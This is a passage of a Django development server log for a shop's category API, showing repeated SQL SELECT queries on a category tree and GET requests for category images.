"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:46:30,538 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:46:30,543 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:46:30,547 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:46:30,554 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:46:30,561 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:46:30,565 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:46:30,569 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:46:30,573 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:46:30,579 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:46:30,585 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:46:30,589 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:46:30,593 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:46:30,597 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:46:30,605 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:46:30,609 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:46:30,613 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:46:30,616 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:46:30,619 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:46:30,621 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:46:30,627 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:46:30,631 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:46:30,635 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:46:30,639 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:46:30,643 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:46:30,649 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:46:30,653 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:46:30,657 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:46:30,661 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:46:30,666 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:46:30,671 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:46:30,674 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:46:30,676 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:46:30,678 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:46:30,680 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:46:30,683 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:46:30,685 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:46:30,688 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:46:30,690 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:46:30,693 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:46:30,695 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:46:30] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:46:31] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:46:31] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 13:46:31] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 13:46:31] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 13:46:31] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 13:46:31] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 13:46:38] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 13:46:41] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 13:46:41] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 13:46:44] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 13:47:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:47:39,803 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:47:39,808 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [19/Dec/2019 13:47:39] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:47:39,811 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:47:39,817 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:47:39,821 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:47:39,823 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:47:39,828 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:47:39,831 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:47:39,833 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:47:39,836 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:47:39,839 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:47:39,843 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:47:39,845 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:47:39,848 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:47:39,851 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:47:39,853 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:47:39,857 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:47:39,860 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:47:39,863 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:47:39,866 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:47:39,871 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:47:39,878 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:47:39,882 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:47:39,886 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:47:39,890 utils 4252 140031721535232 (0.001) SELECT 